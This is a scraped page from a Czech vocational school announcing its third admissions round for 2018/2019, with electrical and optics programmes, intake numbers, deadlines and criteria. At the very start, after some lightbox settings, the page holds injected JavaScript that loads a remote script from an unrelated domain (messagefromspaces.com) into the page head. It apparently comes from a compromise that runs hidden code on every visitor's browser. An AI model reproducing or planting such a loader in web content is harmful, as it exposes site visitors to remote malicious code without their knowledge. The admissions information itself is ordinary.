, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false });var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script);})

PŘIJÍMACÍ ŘÍZENÍ

VYHLÁŠENÍ 3. KOLA PŘIJÍMACÍHO ŘÍZENÍ DO PRVNÍCH ROČNÍKŮ VZDĚLÁVÁNÍ PRO ŠKOLNÍ ROK 2018/2019

Přihlášky ke stažení zde
Zdravotní omezení pro jednotlivé obory +
Kategorizace prací jako forma hodnocení zdravotních rizik z práce

Posudek  lékaře o zdravotní způsobilosti

Denní studium po skončení povinné školní docházky – studijní obory 

Přihlášky ke studiu se odevzdávají průběžně (nejpozději do 31. 8. 2018)!

Výsledky budou zveřejňovány průběžně.

Předpoklady pro přijetí:
– splnění, v den nástupu na střední školu, povinné školní docházky,
– zdravotní způsobilost pro daný obor studia.

 Předpokládané počty přijímaných uchazečů:
– 4-letý obor zakončený maturitní zkouškou 26-41-L/01 Mechanik elektrotechnik
                        Školní vzdělávací program Mechanik elektrotechnik ……………….. 10 uchazečů
– 4-letý obor zakončený maturitní zkouškou 23-62-L/01 Optik
                        Školní vzdělávací program Optik ……………….. 2 uchazeči 

Obsah, forma a stanovené termíny přijímacích zkoušek
Podle ustanovení § 60 zákona rozhodl ředitel školy o nekonání školní přijímací zkoušky.

 Kritéria:
– Školní výsledky ze ZŠ.
– Kapacita oboru.

 


Denní studium po skončení povinné školní docházky – učební obory:

Přihlášky ke studiu se odevzdávají průběžně (nejpozději do 31. 8. 2018)!

Výsledky budou zveřejňovány průběžně.

Předpoklady pro přijetí:
– splnění, v den nástupu na střední školu, povinné školní docházky,
– zdravotní způsobilost pro daný obor studia.

Předpokládané počty přijímaných uchazečů:
– 3-letý obor zakončený závěrečnou zkouškou s výučním listem 26-51-H/01 Elektrikář
                        Školní vzdělávací program Elektrikář ……………….. 7 uchazečů
– 3-letý obor zakončený závěrečnou zkouškou s výučním listem 26-51-H/02 Elektrikář – silnoproud
Školní vzdělávací program Elektrikář – silnoproud ……………….. 1 uchazeč
– 3-letý obor zakončený závěrečnou zkouškou s výučním listem 26-52-H/01 Elektromechanik pro zařízení a přístroje

Školní vzdělávací program Elektromechanik pro automatizační zařízení ……………….. 5 uchazečů

Obsah, forma a stanovené termíny přijímacích zkoušek
Podle ustanovení § 60 zákona rozhodl ředitel školy o nekonání školní přijímací zkoušky.

Kritéria:
– Školní výsledky ze ZŠ.
– Kapacita oboru.

 

Denní nástavbové studium po skončení učebního oboru:

Přihlášky ke studiu se odevzdávají průběžně (nejpozději do 31. 8. 2018)!

Výsledky budou zveřejňovány průběžně.

Předpoklady pro přijetí:

– Úspěšné ukončení učebního oboru zaměřeného na elektrotechniku ke dni nástupu ke studiu (doložení výučního listu).

Předpokládané počty přijímaných uchazečů:
– 2-letý obor zakončený maturitní zkouškou  26–41–L/52 Provozní elektrotechnika
                        Školní vzdělávací program Provozní elektrotechnika ……………….. 2 uchazeči

Obsah, forma a stanovené termíny přijímacích zkoušek
Podle ustanovení § 60 zákona rozhodl ředitel školy o nekonání školní přijímací zkoušky.

Kritéria:
– Školní výsledky ze SŠ.
– Kapacita oboru.